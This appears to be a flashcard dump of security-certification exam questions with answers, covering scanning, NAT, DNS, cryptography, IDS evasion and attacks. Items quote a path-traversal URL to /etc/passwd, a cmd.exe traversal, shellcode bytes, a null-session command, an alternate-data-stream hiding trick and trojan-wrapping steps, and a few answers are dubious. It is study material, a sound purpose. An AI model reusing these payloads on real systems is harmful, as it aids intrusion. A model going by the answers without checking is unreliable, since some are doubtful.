Which of the following is defined as ensuring the enforcement of organizational security policy does not rely on voluntary user compliance by assigning sensitivity labels on information and comparing this to the level of security a user is operating at? A. Mandatory access control B. Authorized access control C. Role-based access control D. Discretionary access control
A. DNS poisoning
Which of the following is described as the process of distributing incorrect IP addresses and name pairs with the intent of diverting traffic? A. DNS poisoning B. DNS spoofing C. Network aliasing D. Reverse Address Resolution Protocol
D)Internal website not the same as the external company website
Which of the following is evidence of a DNS poisoning attack? A)Data forwarded to the wrong switch ports B)Unusual amount of TCP SYN requests to the web server C)Traffic misdirected internally to the wrong subnet D)Internal website not the same as the external company website
D)ACLs on the router and NTFS permissions on files
Which of the following is the BEST example of defense in depth? A)Two access control lists on the same router B)Two factors required for authentication on a single system C)Two different anti-virus applications installed on every computer D)ACLs on the router and NTFS permissions on files
B)DSA
Which of the following is the Federal Information Processing Standard for digital signatures? A)AES B)DSA C)RSA D)GAK
D) Ensure services run with least privilege
Which of the following is the best choice for protection against privilege escalation vulnerabilities? A) Ensure drivers are appropriately signed B) Set admin accounts to run on least privilege C) Make maximum use of automated services D) Ensure services run with least privilege
C. Connect to a SPAN port on a switch
Which of the following is the best choice in setting an NIDS tap? A. Connect directly to a server inside the DMZ. B. Connect directly to a server in the intranet. C. Connect to a SPAN port on a switch. D. Connect to the console port of a router.
B)Sheep dipping
Which of the following is the process of analyzing suspect files for viruses and other malware? A)Purging B)Sheep dipping C)Cleaning D)Degaussing
D)Symmetric algorithm
Which of the following is true of 3DES? A)Hashing algorithm B)Stronger than AES C)Stream cipher D)Symmetric algorithm
E) All of the above
Which of the following is true regarding Kerberos? A) Kerberos makes use of UDP as a transport protocol B) Kerberos makes use of TCP as a transport protocol C) Kerberos uses port 88 for transmission of data D) Kerberos makes use of both symmetric and asymmetric encryption techniques E) All of the above
C) MX record priority increases as the preference number decreases
Which of the following is true regarding MX records? A) MX records require an accompanying CNAME record B) MX records point to name servers C) MX record priority increases as the preference number decreases D) MX record entries are required for every namespace
C) MX records priority increases as the preference number decreases
Which of the following is true regarding MX records? A) MX records require an accompanying CNAME record B) MX records point to name servers C) MX records priority increases as the preference number decreases D) MX record entries are required for every namespace
A) SSL works at the transport layer and S-HTTP operates at the application layer
Which of the following is true regarding SSL and S-HTTP? A) SSL works at the transport layer and S-HTTP operates at the application layer B) SSL works at the Network layer and S-HTTP operates at the application layer C) SSL works at the application layer and S-HTTP operates at the Network layer D) SSL works at the application layer and S-HTTP operates at the transport layer
B) A POP3 client contacts the server to receive mail
Which of the following is true regarding a POP3 client? A) A POP3 client contacts the server to send mail B) A POP3 client contacts the server to receive mail C) A POP3 client contacts the server to send and receive mail D) None of the above
A. Static NAT is one to one mapping
Which of the following is true regarding static NAT? A. Static NAT is one to one mapping B. Static NAT is one to many mapping C. Static NAT is many to many mapping D. Static NAT is many to one mapping
A) The location of the Snort rules for this device is c:\ect\snort\rules
Which of the following is true regarding the Snort configuration entry shown here: val RULE_PATH c:\ect\snort\rules A) The location of the Snort rules for this device is c:\ect\snort\rules B) All rule violations should alert to c:\ect\snort\rules C) The Snort configuration file is located in c:\ect\snort\rules D) None of the above
D. traceroute
You are on a Cisco router and wish to identify the path a packet travels to a specific IP. Which of the following is the best command choice for this? A. ping B. ifconfig C. tracert D. traceroute
D. It is almost impossible to discover the sniffer on the network.
Which of the following is true regarding the discovery of sniffers on a network? A. To discover the sniffer, ping all addresses and examine latency in responses. B. To discover the sniffer, send ARP messages to all systems and watch for NOARP responses. C. To discover the sniffer, configure the IDS to watch for NICs in promiscuous mode. D. It is almost impossible to discover the sniffer on the network.
telnet
Which of the following is used for banner grabbing?
Netcraft
Which of the following is used for identifying a web server OS?
D. Base64
Which of the following is used to encode passwords within HTTP basic access authentication? A. MD5 B. TDM C. FDM D. Base64 E. DES
nmap
Which of the following is used to perform customized network scans?
A) A worm is malware B) A worm replicates on its own
Which of the following is/are true of a worm? A) A worm is malware B) A worm replicates on its own
C)Java
Which of the following languages poses the highest security risk because of its high penetration rate, number of documented vulnerabilities, and average user patch status? A)C++ B)C# C)Java D)Python
B)CSIRT
Which of the following organizations provides incident response services in partnership with the Department of Homeland Security? A)OWASP B)CSIRT C)NIST D)ITIL
D)More acceptance of the policy
Which of the following results when a consistent security policy has the support of executive management? A)More compressed SLAs B)More input from users C)Fewer security breaches D)More acceptance of the policy
B. MAC flooding D. ARP spoofing
Which of the following techniques can be used to gather information from a fully switched network or to disable some of the traffic isolation features of a switch? (Choose two.) A. DHCP starvation B. MAC flooding C. Promiscuous mode D. ARP spoofing
A)Token-passing network
Which of the following technologies passes a signal between nodes that authorizes each node to communicate only when the node possesses the signal? A)Token-passing network B)VPN C)Mesh network D)Star network
A. Whisker B. Fragroute E. ADMutate F. Inundator
Which of the following tools can assist with IDS evasion? (Choose all that apply.) A. Whisker B. Fragroute C. Capsa D. Wireshark E. ADMutate F. Inundator
C. TCPflow
Which of the following tools can be used to extract application layer data from TCP connections captured in a log file into separate files? A. Snort B. Netcat C. TCPflow D. Tcpdump
C. Libwhisker
Which of the following tools is the best choice to assist in evading an IDS? A. Nessus B. Nikto C. Libwhisker D. Snort
E)SwayzCryptor
Which of the following tools is used to obfuscate binary code in an executable so that it is undetectable by anti-virus software? A)Cygwin B)ChewBacca C)CyberGate D)g++ E)SwayzCryptor
C)Routers
Which of the following use a rule-based access model? A)NTFS permissions B)US military C)Routers D)Hubs
C)SHA 1
Which of the following uses 160 bits for hashing? A)MD5 B)SHA 2 C)SHA 1 D)SHA 3
C)iptables
Which of the following versions of the Linux firewall is required for Linux kernel versions 2.4x and above? A)NPF B)ipfwadm C)iptables D)ipchains
D. PCI DSS (Payment Card Industry Data Security Standard)
Which of the following was created to protect credit card data at rest and in transit in an effort to reduce fraud? A. TCSEC B. Common Criteria C. ISO 27002 D. PCI DSS
C. SOX (Sarbanes-Oxley Act)
Which of the following was created to protect shareholders and the general public from corporate accounting errors and fraudulent practices, and to improve the accuracy of corporate disclosures? A. GLBA B. HIPAA C. SOX D. FITARA
C)Mantrap
Which of the following would be an appropriate mitigation for tailgating? A)Redundancy B)Account lockout policy C)Mantrap D)iptables
C. Netcraft
Which of the following would be the best choice for footprinting restricted URLs and OS information from a target? A. www.archive.org B. www.alexa.com C. Netcraft D. Yesware
C. A guard posted outside the door
Which of the following would be the best example of a deterrent control? A. A log aggregation system B. Hidden cameras onsite C. A guard posted outside the door D. Backup recovery systems
A)The same key is used to encrypt and decrypt data.
Which one of the following statements best describes symmetric encryption? A)The same key is used to encrypt and decrypt data. B)Data is hashed and signed by a digital signature issued from a trusted third-party. C)One private key is used to encrypt and another public key is used to decrypt data. D)Data is concealed in ignored sections of files.
A)CSIRT
Which organization provides an incident response service to act as a reliable and trusted single point of contact for reporting computer security incidents worldwide? A)CSIRT B)GSI C)NIST D)OWASP
Tailgating
Which physical security issues is mitigated by a mantrap?
A)80
Which port is the most likely to be open on a web server? A)80 B)23 C)25 D)3389
D)80
Which port number is used by the HTTPTunnel tool to bypass a firewall? A)666 B)22 C)3389 D)80
C. TCP 53
Which protocol and port number combination is used by default for DNS zone transfers? A. UDP 53 B. UDP 161 C. TCP 53 D. TCP 22
B)ICMP C)UDP
Which protocols are used by default when executing a traceroute in UNIX/Linux and Windows? (Choose all that apply.) A)RTP B)ICMP C)UDP D)TCP
VoIP enumeration
___ provides sensitive information such as VoIP gateways/servers, IP-PBX systems, client software (softphones)/VoIP phones, user-agent IP addresses and user extensions
C)The attacker sends personnel an email that appears to come from an individual with the authority to request confidential information, but the email includes a bogus link.
Which scenario demonstrates a phishing attack? A)The attacker attempts to gain confidential information, especially login credentials, by looking over an authorized user's shoulder. B)A program writes data to a buffer until it overruns the buffer's boundary and overwrites adjacent memory locations. C)The attacker sends personnel an email that appears to come from an individual with the authority to request confidential information, but the email includes a bogus link. D)The attacker attempts to steal passwords through an innocent looking application.
File permissions
Which security control can prevent data access by a hacker interacting and modifying HTML on a web server?
Controlling the use of USB ports
Which security policy will mitigate the copying of sensitive data to a USB drive?
D)Wassenaar Arrangement
Which standard provides guidelines for the responsible and open transfer of conventional arms and sensitive or dual-use military resources? A)ISO 2700 B)Rainbow Books C)Common Criteria D)Wassenaar Arrangement
Trusted Computer System Evaluation Criteria (TCSEC)
Which standard uses divisions called security assurance levels to evaluate products?
Information Technology Security Evaluation Criteria (ITSEC)
Which standard uses levels called security functional requirements to assess security functionality?
D)Restore systems to normal service operation as quickly as possible
Which statement best describes the purpose of incident management? A)Log all incidents that take place in an organization B)Trigger alerts to prevent potential risks and threats C)Analyze vulnerabilities as quickly as possible D)Restore systems to normal service operation as quickly as possible
Session hijacking is an attack that aims at stealing a legitimate session and posing as that user while communicating with the web resource
Which statement defines session hijacking most accurately?
B)Static NAT uses a one-to-many mapping
Which statement is FALSE with regard to network address translation (NAT)? A)Dynamic NAT uses a many-to-many mapping B)Static NAT uses a one-to-many mapping C)Static NAT uses a one-to-one mapping D)PAT uses a many-to-one mapping
B)SSL operates above the Transport layer.
Which statement is true about SSL? A)SSL is protected against CBC attacks. B)SSL operates above the Transport layer. C)SSL is an active encryption standard. D)SSL encrypts each message independently.
A)GAK
Which term refers to the statutory obligation of companies to disclose their cryptographic keys to government agencies? A)GAK B)TPM C)key escrow D)PKI
B)Protection profiles C)Evaluation assurance levels
Which two of the following are key components of the Common Criteria evaluation system? A)Security functional requirements B)Protection profiles C)Evaluation assurance levels D)Security assurance levels
Phlashing
Which type of DDoS attack can damage actual networking hardware?
SYN flooding
Which type of DDoS attack takes advantage of the TCP three-way handshake to overwhelm the victim's listening queue?
B)Polymorphic shellcode
Which type of IDS evasion technique hides commonly used strings with encoding and uses a stub to decode and execute differently each time? A)ASCII shellcode B)Polymorphic shellcode C)Packet fragmentation D)Overlapping fragments
Dynamic NAT
Which type of NAT uses a many-to-many mapping model?
Port Address Translation (PAT)
Which type of NAT uses a one-to-many mapping model?
Static NAT
Which type of NAT uses a one-to-one mapping model?
B)Rule-based access control
Which type of access control is supported by standard routers? A)Role-based access control B)Rule-based access control C)Mandatory access control D)Discretionary access control
MAC flood attacks
Which type of attack can be prevented by using port security to create static ARP entries in the MAC table?
SYN flood
Which type of attack exploits the TCP handshake process?
B. White box
Which type of attack is generally conducted as an inside attacker with elevated privileges on the resources? A. Gray box B. White box C. Black box D. Active reconnaissance
MAC flood attack
Which type of attack sends many frames with bogus MAC addresses as the source?
Session fragmentation
Which type of attack splits the attack payload into many packet fragments?
Switches
Which type of device is targeted by MAC flood attacks?
C) Hardware
Which type of keylogger cannot be detected by antivirus software? A) Stealth B) Heuristic C) Hardware D) Software
Brute force
Which type of password attack attempts every combination of characters?
White box
Which type of penetration test requires the tester to have complete knowledge of the target system(s)?
Black box
Which type of penetration test requires the tester to have no knowledge of the target system(s)?
Gray box
Which type of penetration test requires the tester to have only limited knowledge of the target system(s)?
A) FIN
Which type of port scan sets only the flag that brings TCP conversations to an orderly close? A) FIN B) RST C) IDLE D) XMAS
B)WPA2
Which wireless encryption mechanism uses AES? A)WEP B)WPA2 C)WPA D)LEAP
Hacktivism
Which word refers to hacking for a specific cause?
SNMP
___ was designed to manage IP-enabled devices across a network.
C)Gateway between an inside and outside network that is located on the public side of the DMZ and is designed to defend against attacks aimed at the inside network
While implementing a demilitarized zone (DMZ) to protect several network resources, your company decides to implement a bastion host. What is the BEST description of this device? A)Component that restricts access between an internal network and the Internet or between other sets of networks B)Resource, usually located on the DMZ, that pretends to be a real target, but is really an isolated resource where the attacker cannot do any real damage C)Gateway between an inside and outside network that is located on the public side of the DMZ and is designed to defend against attacks aimed at the inside network D)System fitted with two network interfaces that sits between a public, untrusted network and an internal network to provide secure access
B)Tails
While researching specific security issues for your company, you want to use an anonymizer to ensure that your privacy is protected. Which of the following is NOT an anonymizer? A)TOR B)Tails C)Psiphon D)Proxify
text viewers
Whitespace Steganography Because spaces and tabs are generally not visible in ___, the message is effectively hidden from casual observers
SNOW
Whitespace Steganography Use ___ tool to hide the message
built-in encryption
Whitespace Steganography Use of ___ makes the message unreadable even if it is detected
-To hide the source IP address so that they can hack without any legal corollary -To mask the actual source of the attack by impersonating a fake source address of the proxy -To remotely access intranets and other website resources that are normally off limits -To interrupt all the requests sent by a user and transmit them to a third destination, hence victims will only be able to identify the proxy server address -Attackers chain multiple proxy servers to avoid detection
Why do attackers use proxy servers?
Privacy and anonymity Protects from online attacks Access restricted content Bypass IDS and Firewall rules
Why use an anonymizer?
To hide malicious file content within a benign file
Why would a hacker utilize alternate data streams (ADS)?
D)Evade detection by the IDS
Why would an attacker work very slowly when performing a ping scan of the network? A)Reduce the network traffic B)Ensure all machines are scanned C)Give the targets more time to respond D)Evade detection by the IDS
determine the security context
The Windows operating system uses access tokens to ___ of a process or thread
802.11
Wireless LAN standards created by IEEE
Hub
Wireless access points function as a ____.
A. When the primary SOA record serial number is higher than the secondary's
Within the DNS system, a primary server (SOA) holds and maintains all records for the zone. Secondary servers will periodically ask the primary if there have been any updates, and if updates have occurred, they will ask for a zone transfer to update their own copies. Under what conditions will the secondary name server request a zone transfer from a primary? A. When the primary SOA record serial number is higher than the secondary's B. When the secondary SOA record serial number is higher than the primary's C. Only when the secondary reboots or restarts services D. Only when manually prompted to do so
Motive
____ originates out of the notion that the target system stores or processes something valuable and this leads to threat of an attack on the system
D)On Linux/Unix machines, there is no response.
You are a network security analyst for your company. You perform the following scan from a remote machine: nmap -sX 141.8.225.72 You use Wireshark to capture the response packets. How do you determine which ports are open? A)On Windows machines, there is no response. B)On all machines, there is SYN/ACK response. C)On all machines, there is RST response. D)On Linux/Unix machines, there is no response.
B)Block all traffic over port 110.
You are a security administrator working in Chicago. The Chicago office currently has a policy in place that users should not read personal email on corporate devices. However, you have recently noticed a lot of POP3 traffic over your network even though your company's email service uses SMTP and IMAP. The office manager requests that you block POP3 traffic at the firewall. What should you do? A)Block all traffic over port 25. B)Block all traffic over port 110. C)Block incoming traffic over port 110. D)Block incoming traffic over port 25.
D)Using a mobile app to gain access to internal networks
You are a security analyst evaluating possible threats using Blackberry mobile devices. Which best describes a blackjacking attack? A)Using a mobile app to gain access to the Blackberry Enterprise Server (BES) B)Using the Blackberry Enterprise Server (BES) to limit the rights of mobile apps C)Using the Blackberry Enterprise Server (BES) to block mobile app installation D)Using a mobile app to gain access to internal networks
C)Restore from local backup media
You are a security analyst hired by a company to determine their possible response strategies to various cloud computing threats. You determine that their current cloud provider is vulnerable to SQL injection attacks. Their current versions of virtual OSes are also prone to kernel-level rootkits. If an attacker exploits both of these vulnerabilities, which response strategy would you recommend they use to sanitize an affected virtual machine? A)Roll back to the latest cloud storage snapshot B)Copy and replace key system files from an unaffected virtual machine C)Restore from local backup media D)Run a virus scan to quarantine and delete any detected files
A) The port is open
You are performing a FIN scan and get no response from a port. What does this indicate? A) The port is open B) The port is closed C) The scan has failed to reach the target D) None of the above
C)Limit the frequency of manual installations in patch management plan
You are a security consultant for a large retail chain. You have been asked to help the company establish the appropriate procedures to ensure that they comply with the PCI-DSS standard. Which of the following guidelines is NOT required for compliance? A)Restrict physical access to cardholder data B)Assign a unique ID to each person with computer access C)Limit the frequency of manual installations in patch management plan D)Install and maintain a firewall configuration to protect cardholder data
A)Perform a Boolean-based blind SQL injection attack, and include the results in the audit report.
You are an ethical hacker. You recently gained consent from an online healthcare service company to begin a series of penetration tests. These tests should only be performed during off-peak hours on Saturday and Sunday, so as not to greatly affect existing patients. You identify a SQL injection vulnerability in the account logon form. Which of the following actions would most likely NOT violate your professional code of conduct? A)Perform a Boolean-based blind SQL injection attack, and include the results in the audit report. B)Perform a WAITFOR DELAY blind SQL injection attack, and run an endless loop to stall database services. C)Perform a standard SQL injection attack, and retrieve patient records to attach to the audit report. D)Perform a standard SQL injection attack, and drop all tables required for appointment information.
A) APNIC
You are asked to test a client headquartered in Japan. Which regional registry should you begin competitive intelligence research with? A) APNIC B) RIPE C) ASIANIC D) ARIN E) LACNIC
A. > server ADNS_SERVER ... > set type=HINFO > ATARGET_SYSTEM ...
You are attempting to find out the operating system and CPU type of systems in your target organization. The DNS server you wish to use for lookup is named ADNS_Server, and the target machine you want the information on is ATARGET_SYSTEM. Which of the following nslookup command series is the best choice for discovering this information? (The output of the commands is redacted.) A. > server ADNS_SERVER ... > set type=HINFO > ATARGET_SYSTEM ... B. > server ATARGET_SYSTEM ... > set type=HINFO > ADNS_SERVER ... C. > server ADNS_SERVER ... > set ATARGET_SYSTEM > type=HINFO ... D. > server type=HINFO ... > set ADNS_SERVER > ATARGET_SYSTEM ...
D)23
You are concerned about an employee's use of Telnet when connecting to routers and switches to administer these devices. You would like to perform a port scan on all of these devices to identify any that are still enabled for Telnet. Which open port number(s) are you looking for in the results? A)80 B)21 C)135 to 139 D)23
D)Black box
You are concerned about external hackers gaining control of a new web application. With that threat actor in mind, which of the following tests would be appropriate? A)White box B)Gray box C)Clear box D)Black box
http://www.verigon.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %0D%70%61%73%73%77%64 = passwd
You are concerned that your Web server could be attacked with an obfuscated URL. You want to configure a rule on the IDS to alert you when a strange Unicode request occurs. Which of the following is an example of a strange Unicode request? A)GET /scripts/..%255c../windows/system32/cmd.exe?/c+dir HTTP/1.1 200 B)GET /cgi- bin/cvslog.cgi=<SCRIPT>management.alert</SCRIPT> HTTP/1.1 403 C)GET /AAAAAAAAAAAAAAAAAAAA\ x90\x90\x90\x83\xec\x27\xeb\x0c\xe7\xe1\xe6\xc1\xc0\xff 500 D)http://www.verigon.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %0D%70%61%73%73%77%64 = passwd
D)permit 220.60.6.6 192.168.5.62/29 RDP 3389
You are configuring a firewall to allow the CTO to connect remotely to a number of workstations located in the corporate network. The CTO will use his company-issued notebook with a remote IP address of 220.60.6.6. The corporate network contains hosts in the 192.168.5.62/29 range. Which firewall rule should be added to allow the required RDP connections? A)permit 192.168.5.56/29 220.60.6.6 RDP 3389 B)permit 220.60.6.6 192.168.5.0/29 RDP 3389 C)permit 220.60.6.6 192.168.5.62/29 RDP 443 D)permit 220.60.6.6 192.168.5.62/29 RDP 3389
B)Add a rule to allow ICMP Fragmentation-DF-Set messages to enter the network, but not to leave it. D)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only enter the network, not to leave it. E)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from within the network.
You are configuring your corporate firewall. You must prevent anyone from outside the network from using traceroute to gather information about your network while still allowing the use of the tool within the network. Which actions can you take? (Choose all that apply.) A)Add a rule to allow ICMP Fragmentation-DF-Set messages to leave the network, but not to enter it. B)Add a rule to allow ICMP Fragmentation-DF-Set messages to enter the network, but not to leave it. C)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only leave the network, not to enter it. D)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only enter the network, not to leave it. E)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from within the network. F)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from outside the network.
A)Triple-homed bastion host
You are consulting with a company on how best to implement a firewall architecture to meet their needs. The company is a cloud service provider that must allow access to virtual machines and other virtual services while denying access to development and other internal services. Only paying customers and their clients should be allowed access to virtual services. The company requires the highest security solution to optimize availability to their paying customers. Which boundary protection appliance should you recommend they include to meet their requirements? A)Triple-homed bastion host B)High-interaction honeypot C)Dual-homed bastion host D)Low-interaction honeypot
B)Bottom-of-Stack D)Label E)Time-to-Live F)Traffic Class
You are describing to a team member how multiprotocol label switching (MPLS) is implemented to handle VPN traffic across the Internet. MPLS prefixes label stack entries to each network packet. Which fields comprise a label stack entry? (Choose all that apply.) A)Checksum B)Bottom-of-Stack C)Destination Port D)Label E)Time-to-Live F)Traffic Class G)Offset H)Source Port
C)Negligence and liability
You are engaging a penetration testing provider to identify possible vulnerabilities within your organization. You are about to sign the confidentiality agreement and non-disclosure agreement (NDA). What should you verify in the legal language before signing them? A)Checklist of testing requirements B)Rules of engagement C)Negligence and liability D)Fees and project schedule
A. Public (read-only) and Private (read/write)
You are enumerating a subnet. While examining message traffic, you discover SNMP is enabled on multiple targets. If you assume default settings in setting up enumeration tools to use SNMP, which community strings should you use? A. Public (read-only) and Private (read/write) B. Private (read-only) and Public (read/write) C. Read (read-only) and Write (read/write) D. Default (both read and read/write)
D. 52.93.31.255
You are examining a host with an IP address of 52.93.24.42/20 and want to determine the broadcast address for the subnet. Which of the following is the correct broadcast address for the subnet? A. 52.93.24.255 B. 52.93.0.255 C. 52.93.32.255 D. 52.93.31.255 E. 52.93.255.255
A. The host will be attempting to retrieve an HTML file. D. The packet returned in answer to this SYN request will acknowledge the sequence number by returning 10.
You are examining a packet capture of all traffic from a host on the subnet. The host sends a segment with the SYN flag set in order to set up a TCP communications channel. The destination port is 80, and the sequence number is set to 10. Which of the following statements are not true regarding this communications channel? (Choose all that apply.) A. The host will be attempting to retrieve an HTML file. B. The source port field on this packet can be any number between 1024 and 65535. C. The first packet from the destination in response to this host will have the SYN and ACK flags set. D. The packet returned in answer to this SYN request will acknowledge the sequence number by returning 10.
A) The password policy for the machine is weak
You are examining captured LM hash passwords. Several of the password hashes in the file end in "1404EE". Which of the following is true? A) The password policy for the machine is weak B) The password policy for this machine is strong C) The hashes have been salted D) The same password has been used for many accounts
C) Establish a null session for 210.55.44.66
You are examining log files and come across this command line entry: net use \\210.55.44.66\IPC$ "" /u:"" What is this attempting to do? A) Create a listening port on 210.55.44.66 B) Perform a denial of service attack on 210.55.44.66 C) Establish a null session for 210.55.44.66 D) Connect to a Linux machine
D. A firewall is prohibiting connection.
You are examining traffic and notice an ICMP Type 3, Code 13 response. What does this normally indicate? A. The network is unreachable. B. The host is unknown. C. Congestion control is enacted for traffic to this host. D. A firewall is prohibiting connection.
B. It appears to be part of an XMAS scan. D. It appears port 4083 is closed.
You are examining traffic between hosts and note the following exchange: Source Prot Port Flag Destination 192.168.5.12 TCP 4082 FIN/URG/PSH 192.168.5.50 192.168.5.12 TCP 4083 FIN/URG/PSH 192.168.5.50 192.168.5.12 TCP 4084 FIN/URG/PSH 192.168.5.50 192.168.5.50 TCP 4083 RST/ACK 192.168.5.12 192.168.5.12 TCP 4085 FIN/URG/PSH 192.168.5.50 Which of the following statements are true regarding this traffic? (Choose all that apply.) A. It appears to be part of an ACK scan. B. It appears to be part of an XMAS scan. C. It appears port 4083 is open. D. It appears port 4083 is closed.
A)0x0182bd0bd4444bf836077a718ccdf409
You are hardening the CEO's laptop against boot sector viruses by setting the MBR to read-only and enabling password protection in the system BIOS. The BIOS uses a hashing algorithm similar to LAN Manager to generate a checksum that is stored on the FlashROM. Based on the following checksums, which password is the most secure? A)0x0182bd0bd4444bf836077a718ccdf409 B)0x0182bd0bd4444bf8aad3b435b51404ee C)0xaebd4de384c7ec43aad3b435b51404ee D)0x44efce164ab921caaad3b435b51404ee
D)Perform a risk assessment
You are heading a committee that is responsible for creating your company's security policies. What should you do FIRST? A)Train and educate users about security awareness B)Develop the new security policies based on company needs C)Collect standard guidelines to help guide the committee D)Perform a risk assessment
B)echo bad stuff > good.txt:shh
You are identifying system vulnerabilities on a NTFS system. Which of the following command-line statements is an example of alternate data streams (ADS)? A)type bad stuff < good.txt;shh B)echo bad stuff > good.txt:shh C)echo bad stuff > good.txt;shh D)type bad stuff < good.txt:shh
D)Integrity
You are implementing MD5 hashing for all read-only files on critical company servers. If any files are tampered with, then the MD5 hash value will not match. Which element of information security does MD5 hashing provide? A)Confidentiality B)Availability C)Non-repudiation D)Integrity
A)Filter user input with client-side validation and use parameter placeholders.
You are investigating a Perl script that contains the following code: my $user = $q -> param('username'); my $pwd = $q -> param('password'); my $sth = $dbh -> prepare("SELECT authcode FROM customers WHERE uname = '$user' & pwd = '$pwd'"); $sth->execute(); Which modification(s), if any, should you make to prevent SQL injection attacks? A)Filter user input with client-side validation and use parameter placeholders. B)Add robust error handling for user input and provide detailed client-side messages. C)Encrypt all user input on the client-side and tables and columns in the database. D)No modification is necessary.
B)Bind the compilation file (.exe) to winlogon.exe
You are learning to create Trojans by using wrapper tools. You write the following endless loop: #include <iostream> using namespace std; int main( ) { bool done = false; while (!done) { cerr << "Warning, Warning--Trojan running--Warning! Warning!" << endl; } } How would you use a wrapper tool to hide this malware inside of the legitimate Windows executable winlogon.exe? A)Bind the library file (.lib) to winlogon.exe B)Bind the compilation file (.exe) to winlogon.exe C)Bind the declaration file (.h) to winlogon.exe D)Bind the implementation file (.cpp) to winlogon.exe
B. allintitle:CEH V9
You are looking for pages with the terms CEH and V9 in their title. Which Google hack is the appropriate one? A. inurl:CEHinurl:V9 B. allintitle:CEH V9 C. intitle:CEHinurl:V9 D. allinurl:CEH V9
A. intitle:intranet inurl:intranet+intext:"human resources"
You are looking for information on an organization and would like to see what human resources information may be available publicly. Which of the following Google searches looks for a website title of "intranet" with part of the URL containing the word "intranet" and the words "human resources" somewhere in the web page? A. intitle:intranet inurl:intranet+intext:"human resources" B. site:"human resources"+intext:intranet C. cache:"human resources"site:sharepoint+inurl:intranet D. related:human resources inurl:intranet
D) The firewall for the DMZ subnet is not performing stateful inspection
You are performing an ACK scan against a network from an external location. You've identified two web servers on the DMZ subnet and notice that they are responding to the ACK scan. Which of the following best describes the situation? A) They are both IIS servers B) They are both Apache servers C) The IDS is not functioning for the DMZ subnet D) The firewall for the DMZ subnet is not performing stateful inspection
C. Stateful
You are performing an ACK scan against a target subnet. You previously verified connectivity to several hosts within the subnet but want to verify all live hosts on the subnet. Your scan, however, is not receiving any replies. Which type of firewall is most likely in use at your location? A. Packet filtering B. IPS C. Stateful D. Active
D)192.168.1.65-126
You are performing an internal scan of a private subnet with the following command: hping3 -1 192.168.1.127 All hosts are configured with the subnet mask 255.255.255.192. Which IP address or range of addresses will be scanned as a result of running this command? A)192.168.1.127 B)192.168.1-254 C)192.168.1.1-126 D)192.168.1.65-126
A. The response indicates an open port.
You are port scanning a system and begin sending TCP packets with the ACK flag set. Examining the return packets, you see a return packet for one port has the RST flag set and the TTL is less than 64. Which of the following is true? A. The response indicates an open port. B. The response indicates a closed port. C. The response indicates a Windows machine with a non-standard TCP/IP stack. D. ICMP is filtered on the machine.
C)Security assessment F)Incident response G)Security training
You are presenting a proposal to the company CEO on engaging Foundstone for IT security services. Which of the following solution(s) does Foundstone provide? (Choose all that apply.) A)Cyberinsurance B)Business continuity planning C)Security assessment D)Grayhat hacking E)Cloud storage security F)Incident response G)Security training
C)The system was compromised.
You are responsible for reviewing the event logs for several servers. Auditing is enabled on all the computers. Recently during a review, you noticed that there is a four-hour gap in the events contained in the security event log for one server. The security event log contains events before and after the four-hour gap. You check the other logs on the same server and do not notice any time gaps. What is most likely the reason for this time gap in the security event log? A)The system was not running. B)The security event log was full. C)The system was compromised. D)Auditing was disabled on the system.
B)Store all tapes in a secured location on site
You are reviewing a company's backup and recovery procedures. Which of the following practices will increase the likelihood of failure during tape recovery? A)Restore backups on a regular basis B)Store all tapes in a secured location on site C)Rotate backups across multiple tapes D)Perform read-after-write and full verification
D) SNMP walk
You are reviewing log files and results from a day of penetration testing. Examine this small section of scan results: ... System.sysUpTime.0:vTimesticks:(136589017) 13 days, 14:47:30 System.sysContact.0: DISPLAY STRING- (ascii) : System.sysName.0: DISPLAY STRING0 (ascii): Router 1 System.sysLocation.0: DISPLAY STRING- (ascii): ... Which scan or attack was used to generate this output? A) Nmap XMAS scan B) Hping session hijack attempt C) Firewalk D) SNMP walk
A)Change to extractedDataLength >= 65536
You are reviewing source code for any buffer overflow vulnerabilities. The following C++ source code handles data extracted from a compressed file: if (extractedDataLength < 65536) { //Break down data into multiple chunks } else { //Handle data in one large chunk } The data should be broken down into multiple chunks only when the buffer of 65,536 characters is reached or exceeded. How should you modify the condition in the first line of the code? A)Change to extractedDataLength >= 65536 B)Change to extractedDataLength == 65536 C)Change to extractedDataLength <= 65536 D)Change to extractedDataLength > 65536
D)SQL injection
You are reviewing the log files for your company's primary Web server. You notice that there are several instances where the following request is made: SELECT login_id, full_name FROM customers Which attack type could this represent? A)Buffer overflow B)Cross-site scripting C)Cross-site request forgery D)SQL injection
D)-sC
You are running a high-level vulnerability scan using the Nmap utility. The network systems include Windows machines running Internet Information Service (IIS). Which switch should you use to automate and customize vulnerability scanning for different Windows OS and SSL vulnerabilities? A)-sU B)--webxml C)-sO D)-sC
A)There is no stateful firewall installed on the DMZ perimeter.
You are scanning a company's DMZ perimeter using Nmap: sudo nmap -sA 62.77.0.1 Starting Nmap 6.49 ( https://nmap.org ) at 2016-05-09 17:00 EDT Nmap scan report for 62.77.0.1 Host is up (0.013s latency). All 1000 scanned ports on 62.77.0.1 are unfiltered MAC Address: 28:C6:8E:79:4D:22 (Netgear,) Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds Which of the following statements is true of the Nmap results? A)There is no stateful firewall installed on the DMZ perimeter. B)There is a stateful firewall installed on the DMZ perimeter. C)All ports are closed on the DMZ firewall. D)All ports are open on the DMZ firewall.
D. Use HTTP tunneling.
You are separated from your target subnet by a firewall. The firewall is correctly configured and allows requests only to ports opened by the administrator. In firewalking the device, you find that port 80 is open. Which technique could you employ to send data and commands to or from the target system? A. Encrypt the data to hide it from the firewall. B. Use session splicing. C. Use MAC flooding. D. Use HTTP tunneling.
E. CNAME
You are setting up DNS for your enterprise. Server A is both a web server and an FTP server. You want to advertise both services for this machine as name references your customers can use. Which DNS record type would you use to accomplish this? A. NS B. SOA C. MX D. PTR E. CNAME
B)SQL injection
